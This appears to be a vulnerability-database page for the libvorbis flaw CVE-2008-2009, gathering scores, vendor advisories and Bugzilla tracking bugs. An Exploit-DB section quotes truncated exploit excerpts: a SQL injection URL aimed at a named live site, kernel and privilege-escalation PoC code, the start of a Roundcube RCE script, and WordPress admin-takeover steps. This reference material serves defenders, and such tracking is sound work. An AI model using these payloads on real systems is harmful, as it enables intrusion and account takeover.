CVE-2008-2009
published 2008-05-16CVE-2008-2009: Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNINAP
EPSS
3.51%
87.7th percentile
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | libvorbis | < libvorbis 1.2.0.dfsg-4 (bookworm) | libvorbis 1.2.0.dfsg-4 (bookworm) |
| debian | libvorbisidec | < libvorbis 1.2.0.dfsg-4 (bookworm) | libvorbis 1.2.0.dfsg-4 (bookworm) |
| xiph.org | libvorbis | — | — |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
| xiph.org | libvorbis | >= 0 < 1.2.0.dfsg-4 | 1.2.0.dfsg-4 |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_redhat10.0CRITICAL
vendor_debian4.3MEDIUM
vendor_ubuntu4.3MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
dbus: invalid signatures verified as valid due to improper fix for CVE-2008-3834
vendor_redhat·2015-02-06·CVSS 2.1
CVE-2009-1193 [LOW] dbus: invalid signatures verified as valid due to improper fix for CVE-2008-3834
dbus: invalid signatures verified as valid due to improper fix for CVE-2008-3834
No description is available for this CVE.
Ubuntu
libvorbis vulnerabilities
vendor_ubuntu·2009-11-24·CVSS 4.3
CVE-2008-2009 [MEDIUM] libvorbis vulnerabilities
Title: libvorbis vulnerabilities
Summary: libvorbis vulnerabilities
It was discovered that libvorbis did not correctly handle ogg files with
underpopulated Huffman trees. If a user were tricked into opening a
specially crafted ogg file with an application that uses libvorbis, an
attacker could cause a denial of service. (CVE-2008-2009)
It was discovered that libvorbis did not correctly handle certain malformed
ogg files. If a user were tricked into opening a specially crafted ogg file
with an application that uses libvorbis, an attacker could cause a denial
of service or possibly execute arbitrary code with the user's privileges.
(CVE-2009-3379)
Instructions: After a standard system upgrade you need to restart any applications that
use libvorbis, such as Totem and gtkpod, to effect the
Red Hat
pidgin incomplete fix for CVE-2008-2927
vendor_redhat·2009-05-02·CVSS 6.8
CVE-2009-1376 [MEDIUM] pidgin incomplete fix for CVE-2008-2927
pidgin incomplete fix for CVE-2008-2927
Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.
Red Hat
libnasl: OpenSSL incorrect checks for malformed signatures
vendor_redhat·2009-01-11·CVSS 5.8
CVE-2009-0125 [MEDIUM] libnasl: OpenSSL incorrect checks for malformed signatures
libnasl: OpenSSL incorrect checks for malformed signatures
NOTE: this issue has been disputed by the upstream vendor. nasl/nasl_crypto2.c in the Nessus Attack Scripting Language library (aka libnasl) 2.2.11 does not properly check the return value from the OpenSSL DSA_do_verify function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature, a similar vulnerability to CVE-2008-5077. NOTE: the upstream vendor has disputed this issue, stating "while we do misuse this function (this is a bug), it has absolutely no security ramification.
Red Hat
ntp incorrectly checks for malformed signatures
vendor_redhat·2009-01-07·CVSS 5.8
CVE-2009-0021 [MEDIUM] ntp incorrectly checks for malformed signatures
ntp incorrectly checks for malformed signatures
NTP 4.2.4 before 4.2.4p5 and 4.2.5 before 4.2.5p150 does not properly check the return value from the OpenSSL EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys, a similar vulnerability to CVE-2008-5077.
Red Hat
evolution-data-server: S/MIME signatures are considered to be valid even for modified messages (MITM)
vendor_redhat·2008-12-11·CVSS 5.8
CVE-2009-0547 [MEDIUM] evolution-data-server: S/MIME signatures are considered to be valid even for modified messages (MITM)
evolution-data-server: S/MIME signatures are considered to be valid even for modified messages (MITM)
Evolution 2.22.3.1 checks S/MIME signatures against a copy of the e-mail text within a signed-data blob, not the copy of the e-mail text displayed to the user, which allows remote attackers to spoof a signature by modifying the latter copy, a different vulnerability than CVE-2008-5077.
Red Hat
OpenSSH: Plaintext Recovery Attack against CBC ciphers
vendor_redhat·2008-11-19·CVSS 2.6
CVE-2008-5161 [LOW] OpenSSH: Plaintext Recovery Attack against CBC ciphers
OpenSSH: Plaintext Recovery Attack against CBC ciphers
Error handling in the SSH protocol in (1) SSH Tectia Client and Server and Connector 4.0 through 4.4.11, 5.0 through 5.2.4, and 5.3 through 5.3.8; Client and Server and ConnectSecure 6.0 through 6.0.4; Server for Linux on IBM System z 6.0.4; Server for IBM z/OS 5.5.1 and earlier, 6.0.0, and 6.0.1; and Client 4.0-J through 4.3.3-J and 4.0-K through 4.3.10-K; and (2) OpenSSH 4.7p1 and possibly other versions, when using a block cipher algorithm in Cipher Block Chaining (CBC) mode, makes it easier for remote attackers to recover certain plaintext data from an arbitrary block of ciphertext in an SSH session via unknown vectors.
Statement: This issue was addressed for Red Hat Enterprise Linux 5 by
https://rhn.redhat.com/errata/RHSA-2009-1
Red Hat
vim: untrusted python modules search path
vendor_redhat·2008-08-06·CVSS 6.9
CVE-2009-0316 [MEDIUM] vim: untrusted python modules search path
vim: untrusted python modules search path
Untrusted search path vulnerability in src/if_python.c in the Python interface in Vim before 7.2.045 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983), as demonstrated by an erroneous search path for plugin/bike.vim in bicyclerepair.
Statement: This issue did not affect vim as shipped in Red Hat Enterprise Linux 3 and 4. This issue is not planned to be fixed in vim packages in Red Hat Enterprise Linux 5.
Package: vim (Red Hat Enterprise Linux 4) - Not affected
Package: vim (Red Hat Enterprise Linux 5) - Will not fix
Red Hat
kernel: uvcvideo: Fix a buffer overflow in format descriptor parsing
vendor_redhat·2008-07-31·CVSS 10.0
CVE-2008-3496 [CRITICAL] kernel: uvcvideo: Fix a buffer overflow in format descriptor parsing
kernel: uvcvideo: Fix a buffer overflow in format descriptor parsing
Buffer overflow in format descriptor parsing in the uvc_parse_format function in drivers/media/video/uvc/uvc_driver.c in uvcvideo in the video4linux (V4L) implementation in the Linux kernel before 2.6.26.1 has unknown impact and attack vectors.
Statement: Not vulnerable. This issue did not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, 5 or Red Hat Enterprise MRG.
The uvcvideo driver was first added in kernel packages update RHSA-2009:0225 in Red Hat Enterprise Linux 5.3, and it already contained a fix for this flaw.
Red Hat
vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
vendor_redhat·2008-05-14·CVSS 4.3
CVE-2008-2009 [MEDIUM] vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Red Hat
FrameWork: XSS Ajax requests (AST-2009-009)
vendor_redhat·2008-01-23·CVSS 7.5
CVE-2008-7220 [HIGH] CWE-79 FrameWork: XSS Ajax requests (AST-2009-009)
FrameWork: XSS Ajax requests (AST-2009-009)
Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make "cross-site ajax requests" via unknown vectors.
Debian
CVE-2008-2009: libvorbis - Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman...
vendor_debian·2008·CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009: libvorbis - Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman...
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
Scope: local
bookworm: resolved (fixed in 1.2.0.dfsg-4)
bullseye: resolved (fixed in 1.2.0.dfsg-4)
forky: resolved (fixed in 1.2.0.dfsg-4)
sid: resolved (fixed in 1.2.0.dfsg-4)
trixie: resolved (fixed in 1.2.0.dfsg-4)
Red Hat
clamav: security fixes in upstream 0.95 (CVE-2008-6680, CVE-2009-1270)
vendor_redhat·CVSS 5.0
CVE-2008-6680 [MEDIUM] clamav: security fixes in upstream 0.95 (CVE-2008-6680, CVE-2009-1270)
clamav: security fixes in upstream 0.95 (CVE-2008-6680, CVE-2009-1270)
libclamav/pe.c in ClamAV before 0.95 allows remote attackers to cause a denial of service (crash) via a crafted EXE file that triggers a divide-by-zero error.
GHSA
GHSA-m3p3-975g-rc2v: Xiph
ghsa_unreviewed·2022-05-01
CVE-2008-2009 [MEDIUM] GHSA-m3p3-975g-rc2v: Xiph
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
OSV
CVE-2008-2009: Xiph
osv·2008-05-16·CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009: Xiph
Xiph.org libvorbis before 1.0 does not properly check for underpopulated Huffman trees, which allows remote attackers to cause a denial of service (crash) via a crafted OGG file that triggers memory corruption during execution of the _make_decode_tree function.
No detection rules found.
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb·2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
Joomla! Component Jobline 1.3.1 - Blind SQL Injection
exploitdb·2009-07-17
CVE-2009-2554 Joomla! Component Jobline 1.3.1 - Blind SQL Injection
Joomla! Component Jobline 1.3.1 - Blind SQL Injection
---
##################################################
# Joomla Component: Jobline magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################
Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=
[-] Exploit [+]
[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
note:
Jobline
08 Jan 2008
1.3.1
1.5
(c) 2006 Olle Johansson
GNU GPL
# milw0rm.com [2009-07-17]
Exploit-DB
FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
exploitdb·2009-07-09·CVSS 6.9
CVE-2008-3531 [MEDIUM] FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
---
/*
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
*
* For a detailed analysis see:
*
* http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
*
* Sample run:
*
* [argp@leon ~]$ uname -rsi
* FreeBSD 7.0-RELEASE GENERIC
* [argp@leon ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@leon ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
* [argp@leon ~]$ ./cve-2008-3531
* [*] vptr = 0x006e776f
* [*
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB
Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation
exploitdb·2009-02-02
CVE-2009-0449 Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation
Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/33561/info
Multiple Kaspersky products are prone to a local privilege-escalation vulnerability because the applications fail to perform adequate boundary checks on user-supplied data.
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
This issue affects versions in the following product groups:
Kaspersky AV 2008
Kaspersky AV for WorkStations 6.0
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32771.zip
Exploit-DB
Joomla! Component RD-Autos 1.5.5 - SQL Injection
exploitdb·2009-01-15
CVE-2009-0420 Joomla! Component RD-Autos 1.5.5 - SQL Injection
Joomla! Component RD-Autos 1.5.5 - SQL Injection
---
#############################################################################
# #
# Joomla Component RDAutos SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "RDAutos (com_rdautos)"
[~] Version: "1.5.5 Stable"
[~] Date: "29/09/2008"
[~] Author: "Robert Dam"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.rd-media.org"
#################
Exploit-DB
Roundcube Webmail 0.2b - Remote Code Execution
exploitdb·2008-12-22·CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2b - Remote Code Execution
Roundcube Webmail 0.2b - Remote Code Execution
---
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] ||
Exploit-DB
Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
exploitdb·2008-09-25
CVE-2009-0259 Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
---
MS Windows Wordpad .doc File Local Denial of Service PoC
author: securfrog
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar)
# milw0rm.com [2008-09-25]
Exploit-DB
WordPress Core 2.6.1 - SQL Column Truncation
exploitdb·2008-09-07
CVE-2009-2762 WordPress Core 2.6.1 - SQL Column Truncation
WordPress Core 2.6.1 - SQL Column Truncation
---
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin x
email: your email
^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5
Exploit-DB
Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting
exploitdb·2008-07-07
CVE-2008-6838 Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting
Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30116/info
Zoph is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zoph 0.7.2.1 is vulnerable; other versions may also be affected.
UPDATE (July 2, 2009): The vendor disputes that Zoph is affected by these issues. Recent versions of Zoph are reported not vulnerable.
http://www.example.com/demo/search.php?_action=search&_off=[EvilScript]
Bugzilla
CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
bugzilla·2010-06-02·CVSS 7.5
CVE-2009-4881 [HIGH] CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4881 to
the following vulnerability:
Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in
the strfmon implementation in the GNU C Library (aka glibc or libc6)
before 2.10.1 allows context-dependent attackers to cause a denial of
service (application crash) via a crafted format string, as
demonstrated by the %99999999999999999999n string, a related issue to
CVE-2008-1391.
References:
[1] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[2] http://sourceware.org/git/?p=glibc.git;a=commit;h=153aa31b93be22e01b236375fb02a9f9b9a0195f
[3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[4] http://securityreason.com/a
Bugzilla
CVE-2009-4880 glibc (32-bit): Multiple integer overflows in the printf implementation
bugzilla·2010-06-02·CVSS 7.5
CVE-2009-4880 [HIGH] CVE-2009-4880 glibc (32-bit): Multiple integer overflows in the printf implementation
CVE-2009-4880 glibc (32-bit): Multiple integer overflows in the printf implementation
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4880 to
the following vulnerability:
Multiple integer overflows in the strfmon implementation in the GNU C
Library (aka glibc or libc6) 2.10.1 and earlier allow
context-dependent attackers to cause a denial of service (memory
consumption or application crash) via a crafted format string, as
demonstrated by a crafted first argument to the money_format function
in PHP, a related issue to CVE-2008-1391.
References:
[1] http://securityreason.com/achievement_securityalert/67
[2] https://bugzilla.redhat.com/show_bug.cgi?id=524671
[3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
[4] http://sourceware.org/git/?p=glibc.git;a=commit
Bugzilla
CVE-2009-0033 CVE-2009-0580 CVE-2009-0783 CVE-2008-5515 CVE-2009-0781 Multiple tomcat5 vulnerabilities [Fedora all]
bugzilla·2009-11-09·CVSS 5.0
CVE-2009-0033 [MEDIUM] CVE-2009-0033 CVE-2009-0580 CVE-2009-0783 CVE-2008-5515 CVE-2009-0781 Multiple tomcat5 vulnerabilities [Fedora all]
CVE-2009-0033 CVE-2009-0580 CVE-2009-0783 CVE-2008-5515 CVE-2009-0781 Multiple tomcat5 vulnerabilities [Fedora all]
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in all affected branches.
You should *not* refer to this bug publicly, as it is a private "Fedora Project Contributors" bug.
For comments that are specific to the vulnerability please use bugs filed against "Security Response" product referenced in "Blocks" field.
bug #493381: CVE-2009-0033 tomcat6 Denial-Of-Service with AJP connection
bug #503978: CVE-2009-0580 tomcat6 Information disclosure in authentication classes
bug #504153: CVE-2009-0783 tomcat XML parser information disclosure
bug #504753: CVE-2008-5515 tomcat request dispatcher information d
Bugzilla
CVE-2008-6679 CVE-2009-0196 CVE-2009-0792 ghostscript various flaws [F9]
bugzilla·2009-04-15·CVSS 5.0
CVE-2008-6679 [MEDIUM] CVE-2008-6679 CVE-2009-0196 CVE-2009-0792 ghostscript various flaws [F9]
CVE-2008-6679 CVE-2009-0196 CVE-2009-0792 ghostscript various flaws [F9]
F9 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
ghostscript-8.63-3.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/ghostscript-8.63-3.fc9
---
ghostscript-8.63-3.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
Bugzilla
CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
bugzilla·2009-02-09·CVSS 7.1
CVE-2008-4437 [HIGH] CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484756,
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bugs=484756,CVE-2008-6098,CVE-2009-0481,CVE-2009-0482,CVE-2009-0483,CVE-2009-0484,CVE-2009-0485,CVE-2009-0486
---
*** Bug 465959 has been marked as a duplicate of this bug. ***
---
CVE-2008-4437 fixed in upstream 3.0.5 is still unfixed too, adding it to this tracking bug
Bugzilla
CVE-2009-0030 squirrelmail: session management flaw
bugzilla·2009-01-17·CVSS 5.0
CVE-2009-0030 [MEDIUM] CVE-2009-0030 squirrelmail: session management flaw
CVE-2009-0030 squirrelmail: session management flaw
It was discovered that a backport of the patch for CVE-2008-3663 included in SquirrelMail packages as shipped in Red Hat Enterprise Linux 3, 4, and 5 contained a bug, that could result in different users being assigned insecure and identical session identifier. Such session identifiers were assigned if user logged out of SquirrelMail and logged in again without closing web browser.
This could result in sessions of the multiple users to "merge". Certain data from one user's session could have been displayed to other user (such as folder structure, address book and options, but not individual mails), or result in the overwrite of the preferences data with other user's settings.
Further details can be found in the bug #480224.
Discussio
Bugzilla
CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
bugzilla·2008-12-16·CVSS 5.8
CVE-2008-5077 [MEDIUM] CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
Draft advisory from OpenSSL team:
OpenSSL Security Advisory [07-Jan-2009]
Incorrect checks for malformed signatures
Several functions inside OpenSSL incorrectly checked the result after
calling the EVP_VerifyFinal function, allowing a malformed signature
to be treated as a good signature rather than as an error. This issue
affected the signature checks on DSA and ECDSA keys used with
SSL/TLS.
One way to exploit this flaw would be for a remote attacker who is in
control of a malicious server or who can use a 'man in the middle'
attack to present a malformed SSL/TLS signature from a certificate chain
to a vulnerable client, bypassing validation.
This vulnerability is tracked as CVE-2008-5077.
The OpenSSL security team wou
Bugzilla
CVE-2008-3903 asterisk: SIP valid account enumeration flaw
bugzilla·2008-09-05·CVSS 3.5
CVE-2008-3903 [LOW] CVE-2008-3903 asterisk: SIP valid account enumeration flaw
CVE-2008-3903 asterisk: SIP valid account enumeration flaw
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3903 to the following vulnerability:
Asterisk PBX 1.2 through 1.6 and Trixbox PBX 2.6.1, when running with
Digest authentication and authalwaysreject enabled, generates
different responses depending on whether or not a SIP username is
valid, which allows remote attackers to enumerate valid usernames.
References:
http://misel.com/?p=52
Discussion:
Referenced advisory contains proposed patch, but there does not seem to be an official upstream advisory for this issue yet.
---
Upstream advisory with patches:
http://downloads.asterisk.org/pub/security/AST-2009-003.html
CVE-2008-3903 entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3903
---
I bel
Bugzilla
CVE-2008-3143 python: Multiple integer overflows discovered by Google
bugzilla·2008-07-11·CVSS 7.5
CVE-2008-3143 [HIGH] CVE-2008-3143 python: Multiple integer overflows discovered by Google
CVE-2008-3143 python: Multiple integer overflows discovered by Google
Description of problem:
Added checks for integer overflows, contributed by Google. Some are
only available if asserts are left in the code, in cases where they
can't be triggered from Python code.
Proposed upstream patch:
http://svn.python.org/view?rev=60793&view=rev
Discussion:
The Red Hat Security Response Team has rated this issue as having low security
impact, a future update may address this flaw. More information regarding
issue severity can be found here:
http://www.redhat.com/security/updates/classification/
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2009:1176 https://rhn.redhat.com/errata/RHSA-2009-1176.html
---
This issue has been addressed in follow
Bugzilla
CVE-2008-2009 vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
bugzilla·2008-04-28·CVSS 4.3
CVE-2008-2009 [MEDIUM] CVE-2008-2009 vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
CVE-2008-2009 vorbis: insufficient validation of Huffman tree causing memory corruption in _make_decode_tree()
Will Drewry of the Google Security Team created a set of fuzzed OGG test files
to test OGG Vorbis and Tremor implementations. Some of them were causing memory
corruption and crash on old libvorbis versions (prior to 1.0).
Crash / corruption occurred in _make_decode_tree(). This function was removed
prior to the release of upstream version 1.0 in following changes:
https://trac.xiph.org/changeset/2959
https://trac.xiph.org/changeset/2960
Test files do not crash libvobis revision 2960 or later.
Discussion:
Created attachment 303976
Patch from Monty (xiphmont)
Patch adds _check_words, a dry-run variant of _make_words, that does performs
huffman tree validation early in the str
http://secunia.com/advisories/30247http://www.redhat.com/support/errata/RHSA-2008-0271.htmlhttp://www.securitytracker.com/id?1020029http://www.ubuntu.com/usn/USN-861-1http://www.vupen.com/english/advisories/2008/1510/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=444443https://exchange.xforce.ibmcloud.com/vulnerabilities/42521http://secunia.com/advisories/30247http://www.redhat.com/support/errata/RHSA-2008-0271.htmlhttp://www.securitytracker.com/id?1020029http://www.ubuntu.com/usn/USN-861-1http://www.vupen.com/english/advisories/2008/1510/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=444443https://exchange.xforce.ibmcloud.com/vulnerabilities/42521
2008-05-16
Published